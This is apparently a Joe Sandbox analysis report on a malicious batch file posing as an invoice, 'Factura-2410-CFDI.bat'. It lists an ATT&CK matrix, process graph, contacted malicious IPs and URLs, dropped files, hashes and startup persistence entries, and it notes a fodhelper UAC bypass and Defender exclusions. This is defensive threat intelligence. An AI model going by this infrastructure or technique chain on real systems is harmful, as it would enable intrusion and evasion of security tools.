            Deobfuscate/Decode Files or Information            		LSASS Memory3
            File and Directory Discovery            		Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter            		12
            Registry Run Keys / Startup Folder            		12
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager25
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts4
            PowerShell            		Login Hook12
            Registry Run Keys / Startup Folder            		4
            Obfuscated Files or Information            		NTDS151
            Security Software Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Software Packing            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Masquerading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542952 Sample: Factura-2410-CFDI.bat Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 68 fsnat.shop 2->68 70 Suricata IDS alerts for network traffic 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for dropped file 2->74 76 11 other signatures 2->76 10 cmd.exe 1 2->10         started        13 _kjfech8_Vi7.exe 1 2->13         started        15 cmd.exe 1 2->15         started        signatures3 process4 signatures5 90 Suspicious powershell command line found 10->90 92 Bypasses PowerShell execution policy 10->92 17 powershell.exe 16 50 10->17         started        22 curl.exe 2 10->22         started        24 powershell.exe 9 10->24         started        26 conhost.exe 10->26         started        94 Adds a directory exclusion to Windows Defender 13->94 28 conhost.exe 1 13->28         started        30 powershell.exe 28 15->30         started        32 conhost.exe 1 15->32         started        34 cmd.exe 1 15->34         started        process6 dnsIp7 62 62.72.3.210, 49750, 80 PRTL-DE Germany 17->62 64 86.38.217.167, 80 LRTC-ASLT Lithuania 17->64 52 C:\_kjfech8_V\jli.dll, PE32 17->52 dropped 54 C:\_kjfech8_V\exe.txt, PE32 17->54 dropped 56 C:\_kjfech8_V\_kjfech8_V.exe (copy), PE32 17->56 dropped 60 10 other files (3 malicious) 17->60 dropped 78 UAC bypass detected (Fodhelper) 17->78 80 Uses shutdown.exe to shutdown or reboot the system 17->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 17->82 84 3 other signatures 17->84 36 _kjfech8_Vi7.exe 2 17->36         started        39 shutdown.exe 1 17->39         started        58 C:\Users\Public\Documents\vs1.ps1, awk 22->58 dropped 66 fsnat.shop 93.127.200.211, 443, 49752 ASMUNDA-ASSC Germany 30->66 file8 signatures9 process10 signatures11 86 Adds a directory exclusion to Windows Defender 36->86 41 powershell.exe 23 36->41         started        44 WerFault.exe 21 16 36->44         started        46 conhost.exe 36->46         started        process12 signatures13 88 Loading BitLocker PowerShell Module 41->88 48 conhost.exe 41->48         started        50 WmiPrvSE.exe 41->50         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\computer_kjfech8_V.cmd100%AviraBAT/Runner.VPF
            C:\Users\Public\computer_kjfech8_Vy.cmd100%AviraBAT/Runner.VPF
            C:\Users\Public\Documents\vs1.ps1100%AviraTR/PShell.Dldr.VPJ
            C:\Windows \System32\fodhelper.exe3%ReversingLabs
            C:\_kjfech8_V\MSVCR100.dll (copy)0%ReversingLabs
            C:\_kjfech8_V\MSVCR100.txt0%ReversingLabs
            C:\_kjfech8_V\WebView2Loader.dll (copy)0%ReversingLabs
            C:\_kjfech8_V\WebView2Loader.txt0%ReversingLabs
            C:\_kjfech8_V\_kjfech8_V.exe (copy)0%ReversingLabs
            C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)0%ReversingLabs
            C:\_kjfech8_V\exe.txt0%ReversingLabs
            C:\_kjfech8_V\i7.txt0%ReversingLabs
            C:\_kjfech8_V\jli.dll19%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            fsnat.shop
            		93.127.200.211
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://62.72.3.210/ldht/index.phptrue
                		unknown
                https://fsnat.shop/a/08/150822/up/uptrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://contoso.com/powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://crl.microsoft.co:powershell.exe, 00000004.00000002.30086145780.000001E790A45000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlXzipowershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.quovadis.bm0powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://pesterbdd.com/images/Pester.pngXzipowershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://86.38.217.167powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://ocsp.quovadisoffshore.com0powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://62.72.3.210powershell.exe, 00000004.00000002.30087129699.000001E792E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://github.com/Pester/PesterXzipowershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmptrue
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            93.127.200.211
                                                            		fsnat.shopGermany
                                                            		62255ASMUNDA-ASSCtrue
                                                            62.72.3.210
                                                            		unknownGermany
                                                            		5427PRTL-DEtrue
                                                            86.38.217.167
                                                            		unknownLithuania
                                                            		15419LRTC-ASLTfalse

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1542952
                                                            Start date and time:2024-10-27 00:19:16 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 50s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Number of analysed new started processes analysed:21
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Factura-2410-CFDI.bat
                                                            Detection:MAL
                                                            Classification:mal100.rans.expl.evad.winBAT@26/50@1/3
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 389
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .bat

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.251.32.106, 142.250.80.106, 142.250.80.74, 142.251.40.138, 142.251.41.10, 142.250.176.202, 142.251.35.170, 142.250.64.74, 142.251.40.202, 142.250.80.42, 142.250.65.170, 142.250.80.10, 142.250.72.106, 142.251.40.234, 142.251.40.106, 142.251.40.170, 52.168.117.173
                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, firebasestorage.googleapis.com
                                                            • Execution Graph export aborted for target _kjfech8_Vi7.exe, PID 3204 because there are no executed function
                                                            • Execution Graph export aborted for target powershell.exe, PID 8092 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: Factura-2410-CFDI.bat

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            00:21:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
                                                            00:21:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnk
                                                            00:22:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnk
                                                            00:22:23AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnk
                                                            00:22:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnk
                                                            18:21:24API Interceptor825x Sleep call for process: powershell.exe modified
                                                            18:22:05API Interceptor1x Sleep call for process: WerFault.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            93.127.200.211pw.ps1Get hashmaliciousUnknownBrowse
                                                            • 93.127.200.211/a/08/150822/au/logs/index.php?CHLG
                                                            62.72.3.210KKKK.htaGet hashmaliciousUnknownBrowse
                                                              86.38.217.167pw.ps1Get hashmaliciousUnknownBrowse
                                                              • 86.38.217.167/09/index.php
                                                              Facturas-5MngNH.lnkGet hashmaliciousUnknownBrowse
                                                              • 86.38.217.167/lnkld

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              fsnat.shoppw.ps1Get hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              FacturasEnAdjunto-HHH.htaGet hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              FacFiscalDigitalenmi6Q8V_C(549).PDF.vbsGet hashmaliciousUnknownBrowse
                                                              • 89.116.236.122
                                                              6.vbsGet hashmaliciousUnknownBrowse
                                                              • 89.116.236.122

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              PRTL-DESecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                                                              • 62.72.43.173
                                                              SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                                                              • 62.72.43.173
                                                              JJLOVjVrYv.elfGet hashmaliciousMirai, GafgytBrowse
                                                              • 195.214.110.183
                                                              jYEvdBHMOI.elfGet hashmaliciousMiraiBrowse
                                                              • 195.214.110.190
                                                              UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 62.72.43.173
                                                              UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 62.72.43.173
                                                              #U0421#U041f#U041e#U0420#U0410#U0417#U0423#U041c#U0415#U041d#U0418#U0415-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                              • 62.72.43.173
                                                              KKKK.htaGet hashmaliciousUnknownBrowse
                                                              • 62.72.3.210
                                                              Payment_Notice_RECIPIENT_NAME.htmGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 62.72.19.33
                                                              8tGqHMzByM.elfGet hashmaliciousMiraiBrowse
                                                              • 195.214.110.185
                                                              ASMUNDA-ASSCJuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                                              • 93.127.208.30
                                                              EL7ggW7AdA.exeGet hashmaliciousStealc, VidarBrowse
                                                              • 93.127.208.30
                                                              arm6.elfGet hashmaliciousUnknownBrowse
                                                              • 93.127.202.25
                                                              https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                                                              • 93.127.179.137
                                                              https://nationalrecalls.com/outbound-scheduling-callsGet hashmaliciousUnknownBrowse
                                                              • 93.127.179.248
                                                              KKKK.htaGet hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              pw.ps1Get hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              https://maryscenter2-my.sharepoint.com/:o:/g/personal/gmiranda_maryscenter_org/EmGp6Dkk921NtUdFUcUMh9oBCA8FTTR3eEy2-FPQR40DVA?e=Ix5141Get hashmaliciousSharepointPhisherBrowse
                                                              • 93.127.186.197
                                                              https://glamis-house.com/?email=Get hashmaliciousHTMLPhisherBrowse
                                                              • 93.127.186.197
                                                              LRTC-ASLTla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                              • 86.38.197.160
                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                              • 89.117.25.51
                                                              eETnl6XIwnGet hashmaliciousUnknownBrowse
                                                              • 89.117.72.231
                                                              8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 89.117.139.59
                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 86.38.65.119
                                                              Reader_PDF_2024.exeGet hashmaliciousUnknownBrowse
                                                              • 89.117.72.231
                                                              Reader_PDF_2024.exeGet hashmaliciousUnknownBrowse
                                                              • 89.117.72.231
                                                              https://oplaesa.krtra.com/c/HEacb57dq4Yf/pNyXGet hashmaliciousUnknownBrowse
                                                              • 89.117.144.56
                                                              https://firebasestorage.googleapis.com/v0/b/lecongtai-bb82b.appspot.com/o/16-10%2FCompilation%20of%20copyright-protected%20videos%20and%20images.zip?alt=media&token=c97d235f-3349-47aa-b756-15ecdbdf39b1Get hashmaliciousPython Stealer, BraodoBrowse
                                                              • 86.38.202.97
                                                              TF-5713011_slip (2).jarGet hashmaliciousBranchlock ObfuscatorBrowse
                                                              • 86.38.225.161

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eSUNNY HONG VSL PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 93.127.200.211
                                                              JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 93.127.200.211
                                                              WINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 93.127.200.211
                                                              MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                              • 93.127.200.211
                                                              6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                              • 93.127.200.211
                                                              gI1wz7QtZV.lnkGet hashmaliciousLonePageBrowse
                                                              • 93.127.200.211

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\_kjfech8_V\MSVCR100.dll (copy)mXF65oa1GJ.exeGet hashmaliciousUnknownBrowse
                                                                mXF65oa1GJ.exeGet hashmaliciousUnknownBrowse
                                                                  Confirm Me.exeGet hashmaliciousSTRRATBrowse
                                                                    PInstaller.exeGet hashmaliciousSTRRATBrowse
                                                                      123.sfx.exeGet hashmaliciousSTRRATBrowse
                                                                        KKKK.htaGet hashmaliciousUnknownBrowse
                                                                          formatfactory-4-6-1-0.exeGet hashmaliciousUnknownBrowse
                                                                            formatfactory-4-6-1-0.exeGet hashmaliciousUnknownBrowse
                                                                              EYOFFTITMDLXZJFFCCGFDTBIY.msiGet hashmaliciousUnknownBrowse
                                                                                SSCBOLGZFXVJMEICRNQMJOCDIF.msiGet hashmaliciousUnknownBrowse
                                                                                  C:\Windows \System32\fodhelper.exerPO767575.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                    KKKK.htaGet hashmaliciousUnknownBrowse
                                                                                      ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                        IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          7XU2cRFInT.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                              Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                Payroll for July.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  2nd_Quarter_Order_Sheet_xls_0000000000000000000.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    Import_Tax Invoice_PL_xls_0000000000000000000 .exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash__kjfech8_Vi7.exe_c8f99aa578fab6eaaead194b1cb93e27a87ba_17b648d7_79ce850f-cd16-4317-9d1c-184b0f22106c\Report.wer

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.9933003261985374
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:SqbJDEmmBUW4jryfQFKxDu76qfAIO8ot:vb9E/BUW4jm9Du76qfAIO8ot
                                                                                                      MD5:178924F0F429277D7FBB7D3366D96CBC
                                                                                                      SHA1:F9E9D813DD505D2D00AD0ACD9523CA6A1B1BB7E3
                                                                                                      SHA-256:766F9038C9EF7D1F77A3C68C84B0EB5B5DB1D112DEC382E6395F6C5466A6DC40
                                                                                                      SHA-512:AEEA606F912CCD2B358C32BDCFFEE7E95BE6509DBAED34D59A27EF26B8319573D69786901FC611C9184532B2B83883E4C5272A24A271D1EE19E892932C4EBCD4
                                                                                                      Malicious:false
                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.5.4.9.2.4.2.5.2.1.9.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.5.4.9.2.4.5.8.0.2.4.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.c.e.8.5.0.f.-.c.d.1.6.-.4.3.1.7.-.9.d.1.c.-.1.8.4.b.0.f.2.2.1.0.6.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.8.b.2.b.d.1.-.0.c.3.f.-.4.e.f.6.-.a.9.4.f.-.0.4.d.a.a.e.3.0.d.7.8.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=._.k.j.f.e.c.h.8._.V.i.7...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.i.n.i.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.d.4.-.0.0.0.1.-.0.0.4.d.-.5.5.d.d.-.f.b.7.b.f.5.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.3.5.1.9.5.5.1.0.4.c.2.5.d.b.0.2.1.2.7.5.0.d.8.1.4.4.b.f.1.6.0.0.0.0.0.0.0.0.!.0.0.0.0.6.1.5.d.c.2.f.a.8.2.7.f.a.b.3.9.e.1.6.a.7.e.9.7.2.1.f.4.8.4.e.7.f.4.d.3.

                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A84.tmp.dmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 22:22:04 2024, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):83718
                                                                                                      Entropy (8bit):1.8255383231410667
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:3BXyQ/+a5sUfOv58GlWod9PULDrjKgimRxoPTAiLhPlJ7EozN461vc5ZTUy8O4Tj:RiRmWxccyKgDRvivJAozShqD
                                                                                                      MD5:EAFD15AFF54503BA477EB64CB883DC17
                                                                                                      SHA1:62897B3C485E518EC58C714A6A29173763E1DFD1
                                                                                                      SHA-256:F80885DCABAD29734A03C252677531148F76B953FEE68A95E0FDFD5B8C1EA0F2
                                                                                                      SHA-512:18452740DEA95D1E7DA6A220B3786C29BD6D3143C54BE04C470B90146B9AAA44E3352DF242EECF103EA5C1FFC703B31CDA0751B52C38EF5C0B0C1F9BC0DAC5D8
                                                                                                      Malicious:false
                                                                                                      Preview:MDMP..a..... ........k.g........................`...........$....A..........T.......8...........T............,..n........................ ..............................................................................bJ......p!......GenuineIntel...........T............k.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B12.tmp.WERInternalMetadata.xml

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8326
                                                                                                      Entropy (8bit):3.701838695089011
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:R9l7lZNiC786IpKY6Y7PSUU5gmfUYClprT89bX4sfT9m:R9lnNiN6Ipt6YTSUU5gmfr3Xrf0
                                                                                                      MD5:12783BBE48A09C923120DD9E788E2AEC
                                                                                                      SHA1:63387E06033CFCC8ECAFE37866168BCC43FA70C7
                                                                                                      SHA-256:FBEDF10867205CE9A58A6450A0EF5AE1C3AA560755D726927FA29E7437156781
                                                                                                      SHA-512:5D8483CFE6DF6CE6B1A1E29F53C330E0075F727A1801DA8B26BE158DB7D76178CF7678D27AF3EDB3CE988CECBB057C033675FAD2BB7A759B732846C8D3FDA569
                                                                                                      Malicious:false
